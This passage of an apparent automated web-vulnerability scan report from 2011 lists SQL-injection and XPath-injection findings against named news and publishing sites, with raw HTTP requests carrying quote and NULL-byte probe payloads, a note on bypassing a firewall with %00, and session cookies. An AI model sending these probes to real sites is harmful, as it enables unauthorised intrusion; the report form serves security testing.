Cookie: CFID=1230652; CFTOKEN=76495853; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D

Response 1

HTTP/1.1 500 The request has exceeded the allowable time limit Tag: cfoutput
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
server-error: true
Date: Mon, 02 May 2011 22:58:38 GMT
Content-Length: 10083

<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   <html>
   
   <head>
       <title>Unexpected Error</title>
       <style type="tex
...[SNIP]...
<pre>coldfusion.runtime.RequestTimedOutException: The request has exceeded the allowable time limit Tag: cfoutput
   at coldfusion.tagext.io.OutputTag.doStartTag(OutputTag.java:149)
   at cfonError2ecfm215532197$funcONERROR.runFunction(D:\wwwroot\elsevi
...[SNIP]...

Request 2

GET /myarticleservices/booklets/?product_id=4556%2527%2527 HTTP/1.1
Host: webshop.elsevier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1230652; CFTOKEN=76495853; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D

Response 2

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:58:43 GMT
Content-Length: 20048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...

1.6. http://www.ilsole24ore.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ilsole24ore.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.ilsole24ore.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1304392432178-New; s_lastvisit=1304392432179; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:01 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 118698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       
       
               <title>Il Sol
...[SNIP]...
<a class="multi-link" href="http://www.ilsole24ore.com/art/finanza-e-mercati/2011-04-28/asset-tossici-pesano-ancora-215834.shtml?uuid=AaLRGlSD&amp;fromSearch">
...[SNIP]...

1.7. http://www.ilsole24ore.com/s24service [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ilsole24ore.com
Path:   /s24service

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s24service%00'?profilo=shopping_by_id&search_query_id=basicquery&xsl_id=shopping24&order_by=&page_number=1&page_size=10&max_docs=10&highlight=true&keywords=&search_parameters=cquery___1___%28%28[13]'SH246180868',[12]'SH246209950',[11]'SH246160782',[11]'SH246192328',[10]'SH246189182',[10]'SH246233493',[9]'SH246118832',[8]'SH246130070',[8]'SH246141365',[8]'SH246195618'%29%20%3Cin%3E%20idprodotto%20%29___1___OR HTTP/1.1
Host: www.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/art/notizie/2011-05-02/morte-bin-laden-pakistan-afghanistan-093710.shtml?uuid=AaXmPfTD
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; c=undefinedwww.banchedati.ilsole24ore.comwww.banchedati.ilsole24ore.com; SC_LINKS_SH=%5B%5BB%5D%5D; s_cm_NW=undefinedwww.shopping24.ilsole24ore.comwww.shopping24.ilsole24ore.com; SC_LINKS_VG=%5B%5BB%5D%5D; s_lastvisit=1304398129881; s_cc=true; s_nr=1304398768834-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:09:05 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 118644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       
       
               <title>Il Sol
...[SNIP]...
<a class="multi-link" href="http://www.ilsole24ore.com/art/finanza-e-mercati/2011-04-28/asset-tossici-pesano-ancora-215834.shtml?uuid=AaLRGlSD&amp;fromSearch">
...[SNIP]...

2. XPath injection
There are 13 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://www.ansa.it/motori/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /motori/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /motori'/ HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 23:59:38 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.2. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/ansa_banner_array.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web'/banner_js/ansa_banner_array.js HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:00:29 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.3. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/ansa_banner_array.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/banner_js'/ansa_banner_array.js HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:00:30 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.4. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/ansa_banner_array.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/banner_js/ansa_banner_array.js' HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:00:31 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.5. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/msn_banner_array.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web'/banner_js/msn_banner_array.js HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=10143333.1311507310.1304392445.1304392445.1304398726.2; __utmb=10143333; __utmc=10143333; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304420326317:ss=1304420326317

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:02:15 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.6. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/msn_banner_array.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/banner_js'/msn_banner_array.js HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=10143333.1311507310.1304392445.1304392445.1304398726.2; __utmb=10143333; __utmc=10143333; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304420326317:ss=1304420326317

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:02:16 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.7. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/msn_banner_array.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/banner_js/msn_banner_array.js' HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=10143333.1311507310.1304392445.1304392445.1304398726.2; __utmb=10143333; __utmc=10143333; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304420326317:ss=1304420326317

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:02:17 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.8. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/images/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web'/images/favicon.ico HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmb=10143333; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:22:24 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.9. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/images/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/images'/favicon.ico HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmb=10143333; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:22:25 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.10. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/images/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/images/favicon.ico' HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmb=10143333; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:22:26 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.11. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/notizie/photogallery/hp_photo_index.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web%00'/notizie/photogallery/hp_photo_index.xml?d=1304392412995 HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/web/video/visual.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:15:00 GMT
Content-type: text/html
Content-Length: 128891


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.12. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/notizie/photogallery/hp_photo_index.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/notizie%00'/photogallery/hp_photo_index.xml?d=1304392412995 HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/web/video/visual.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:15:06 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.13. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/notizie/photogallery/hp_photo_index.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/notizie/photogallery%00'/hp_photo_index.xml?d=1304392412995 HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/web/video/visual.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:15:11 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

3. HTTP header injection
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

